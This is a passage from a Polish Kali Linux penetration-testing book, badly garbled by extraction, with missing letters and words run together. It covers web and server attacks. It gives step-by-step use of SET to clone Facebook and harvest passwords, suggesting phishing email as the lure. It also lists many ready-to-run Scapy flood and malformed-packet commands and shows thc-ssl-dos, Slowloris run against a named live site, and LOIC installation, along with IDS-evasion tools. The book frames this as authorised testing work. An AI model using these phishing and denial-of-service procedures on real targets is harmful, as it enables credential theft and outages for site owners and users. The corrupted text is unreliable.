Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

